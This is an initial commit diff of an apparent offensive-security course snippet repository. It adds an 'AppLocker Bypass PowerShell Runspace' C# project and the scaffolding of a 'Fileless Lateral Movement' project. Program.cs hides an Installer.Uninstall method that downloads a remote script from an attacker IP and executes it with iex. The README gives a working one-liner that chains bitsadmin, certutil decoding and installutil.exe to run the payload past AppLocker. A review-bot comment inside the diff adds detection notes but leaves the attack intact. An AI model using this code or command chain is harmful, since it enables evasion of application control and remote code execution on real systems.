

initial commit
chvancooten committed Mar 10, 2021
0 parents commit b1ea18c
Showing 231 changed files with 3,468 additions and 0 deletions.
Binary file not shown.
Binary file not shown.
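--- a/AppLocker Bypass PowerShell Runspace/App.config
+++ b/AppLocker Bypass PowerShell Runspace/App.config
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+<startup>
+<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
+</startup>
+</configuration>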
@@ -0,0 +1,58 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>AppLocker_Bypass_PowerShell_Runspace</RootNamespace>
<AssemblyName>AppLocker Bypass PowerShell Runspace</AssemblyName>
<TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Configuration.Install" />
<Reference Include="System.Core" />
<Reference Include="System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
<SpecificVersion>False</SpecificVersion>
<HintPath>..\..\..\..\..\..\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll</HintPath>
</Reference>
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30804.86
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AppLocker Bypass PowerShell Runspace", "AppLocker Bypass PowerShell Runspace.csproj", "{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Debug|Any CPU.Build.0 = Debug|Any CPU
{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Release|Any CPU.ActiveCfg = Release|Any CPU
{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {2EC8A5D7-7AA0-43D5-A631-D9AEC215E93F}
EndGlobalSection
EndGlobal
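--- a/AppLocker Bypass PowerShell Runspace/Program.cs
+++ b/AppLocker Bypass PowerShell Runspace/Program.cs
@@ -0,0 +1,30 @@
+using System;
+using System.Management.Automation;
+using System.Management.Automation.Runspaces;
+using System.Configuration.Install;
+
+namespace Bypass
+{
+class Program
+{
+static void Main(string[] args)
+{
+Console.WriteLine("Nothing going on in this binary.");
+}
+}
+[System.ComponentModel.RunInstaller(true)]
+public class Sample : Installer
+{
+public override void Uninstall(System.Collections.IDictionary savedState)
+{
+String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.67/run.txt') | iex";
+Runspace rs = RunspaceFactory.CreateRunspace();
+rs.Open();
+PowerShell ps = PowerShell.Create();
+ps.Runspace = rs;
+ps.AddScript(cmd);
+ps.Invoke();
+rs.Close();
+}
+}
+}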
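Review bot: `Sample.Uninstall` never disposes `rs` or `ps`, and `rs.Close()` is skipped whenever `ps.Invoke()` throws; both types implement IDisposable, so they belong in `using (Runspace rs = RunspaceFactory.CreateRunspace())` and `using (PowerShell ps = PowerShell.Create())`. Nothing in the file says that the class is reached through `installutil.exe /U` (as the README's one-liner shows) rather than through `Main`, so a comment such as `// Entry point is Installer.Uninstall via InstallUtil /U; Main does nothing on purpose` is needed for a reader to follow the sample. For defenders studying it, the observable behaviour is InstallUtil.exe running an assembly from a user-writable directory and loading System.Management.Automation, and PowerShell script block logging, where enabled, should still record the script executed in the custom runspace. Denying InstallUtil.exe to standard users in the application-control policy removes the path this class depends on.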
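--- a/AppLocker Bypass PowerShell Runspace/Properties/AssemblyInfo.cs
+++ b/AppLocker Bypass PowerShell Runspace/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("AppLocker Bypass PowerShell Runspace")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("AppLocker Bypass PowerShell Runspace")]
+[assembly: AssemblyCopyright("Copyright © 2021")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("94aedce4-d4a2-45db-b98e-860ee6be8385")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]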
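--- a/AppLocker Bypass PowerShell Runspace/README.md
+++ b/AppLocker Bypass PowerShell Runspace/README.md
@@ -0,0 +1,13 @@
+# AppLocker Bypass PowerShell Runspace
+
+We can encode this into a text file with `CertUtil`.
+
+```powershell
+certutil -encode C:\Path\To\Binary.exe binary-coded.txt
+```
+
+We then run the following oneliner on the target to use the combination of Microsoft-signed binaries to effectively bypass AppLocker.
+
+```powershell
+cmd.exe /c del C:\Windows\Tasks\enc.txt && del c:\Windows\Tasks\a.exe && bitsadmin /Transfer theJob http://192.168.49.67/PSRunspace-InvokeRun-certutilCoded.txt C:\Windows\Tasks\enc.txt && certutil -decode C:\Windows\Tasks\enc.txt C:\Windows\Tasks\a.exe && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\a.exe
+```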
Binary file not shown.
@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
</startup>
</configuration>
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,4 @@
// <autogenerated />
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")]
Binary file not shown.
@@ -0,0 +1,4 @@
// <autogenerated />
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")]
Empty file.
@@ -0,0 +1 @@
edaa310d85385d45fdb6b26137bec7797b76c95f
@@ -0,0 +1,9 @@
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\bin\Release\AppLocker Bypass PowerShell Runspace.exe.config
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\bin\Release\AppLocker Bypass PowerShell Runspace.exe
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\bin\Release\AppLocker Bypass PowerShell Runspace.pdb
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\bin\Release\System.Management.Automation.dll
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\obj\Release\AppLocker Bypass PowerShell Runspace.csprojAssemblyReference.cache
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\obj\Release\AppLocker Bypass PowerShell Runspace.csproj.CoreCompileInputs.cache
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\obj\Release\AppLocker Bypass PowerShell Runspace.csproj.CopyComplete
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\obj\Release\AppLocker Bypass PowerShell Runspace.exe
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\obj\Release\AppLocker Bypass PowerShell Runspace.pdb
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
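--- a/Fileless Lateral Movement/App.config
+++ b/Fileless Lateral Movement/App.config
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+<startup>
+<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
+</startup>
+</configuration>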
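--- a/Fileless Lateral Movement/Fileless Lateral Movement.csproj
+++ b/Fileless Lateral Movement/Fileless Lateral Movement.csproj
@@ -0,0 +1,73 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+<PropertyGroup>
+<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+<ProjectGuid>{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}</ProjectGuid>
+<OutputType>Exe</OutputType>
+<RootNamespace>Fileless_Lateral_Movement</RootNamespace>
+<AssemblyName>Fileless Lateral Movement</AssemblyName>
+<TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
+<FileAlignment>512</FileAlignment>
+<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+<Deterministic>true</Deterministic>
+</PropertyGroup>
+<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+<PlatformTarget>AnyCPU</PlatformTarget>
+<DebugSymbols>true</DebugSymbols>
+<DebugType>full</DebugType>
+<Optimize>false</Optimize>
+<OutputPath>bin\Debug\</OutputPath>
+<DefineConstants>DEBUG;TRACE</DefineConstants>
+<ErrorReport>prompt</ErrorReport>
+<WarningLevel>4</WarningLevel>
+</PropertyGroup>
+<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+<PlatformTarget>AnyCPU</PlatformTarget>
+<DebugType>pdbonly</DebugType>
+<Optimize>true</Optimize>
+<OutputPath>bin\Release\</OutputPath>
+<DefineConstants>TRACE</DefineConstants>
+<ErrorReport>prompt</ErrorReport>
+<WarningLevel>4</WarningLevel>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
+<DebugSymbols>true</DebugSymbols>
+<OutputPath>bin\x64\Debug\</OutputPath>
+<DefineConstants>DEBUG;TRACE</DefineConstants>
+<DebugType>full</DebugType>
+<PlatformTarget>x64</PlatformTarget>
+<LangVersion>7.3</LangVersion>
+<ErrorReport>prompt</ErrorReport>
+<Prefer32Bit>true</Prefer32Bit>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
+<OutputPath>bin\x64\Release\</OutputPath>
+<DefineConstants>TRACE</DefineConstants>
+<Optimize>true</Optimize>
+<DebugType>pdbonly</DebugType>
+<PlatformTarget>x64</PlatformTarget>
+<LangVersion>7.3</LangVersion>
+<ErrorReport>prompt</ErrorReport>
+<Prefer32Bit>true</Prefer32Bit>
+</PropertyGroup>
+<ItemGroup>
+<Reference Include="System" />
+<Reference Include="System.Core" />
+<Reference Include="System.Xml.Linq" />
+<Reference Include="System.Data.DataSetExtensions" />
+<Reference Include="Microsoft.CSharp" />
+<Reference Include="System.Data" />
+<Reference Include="System.Net.Http" />
+<Reference Include="System.Xml" />
+</ItemGroup>
+<ItemGroup>
+<Compile Include="Program.cs" />
+<Compile Include="Properties\AssemblyInfo.cs" />
+</ItemGroup>
+<ItemGroup>
+<None Include="App.config" />
+</ItemGroup>
+<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>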
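--- a/Fileless Lateral Movement/Fileless Lateral Movement.sln
+++ b/Fileless Lateral Movement/Fileless Lateral Movement.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30804.86
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Fileless Lateral Movement", "Fileless Lateral Movement.csproj", "{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}"
+EndProject
+Global
+GlobalSection(SolutionConfigurationPlatforms) = preSolution
+Debug|Any CPU = Debug|Any CPU
+Release|Any CPU = Release|Any CPU
+EndGlobalSection
+GlobalSection(ProjectConfigurationPlatforms) = postSolution
+{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Debug|Any CPU.Build.0 = Debug|Any CPU
+{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Release|Any CPU.ActiveCfg = Release|Any CPU
+{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Release|Any CPU.Build.0 = Release|Any CPU
+EndGlobalSection
+GlobalSection(SolutionProperties) = preSolution
+HideSolutionNode = FALSE
+EndGlobalSection
+GlobalSection(ExtensibilityGlobals) = postSolution
+SolutionGuid = {005359DF-09A1-4FE2-8F0F-8F91C2BDE1DC}
+EndGlobalSection
+EndGlobal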

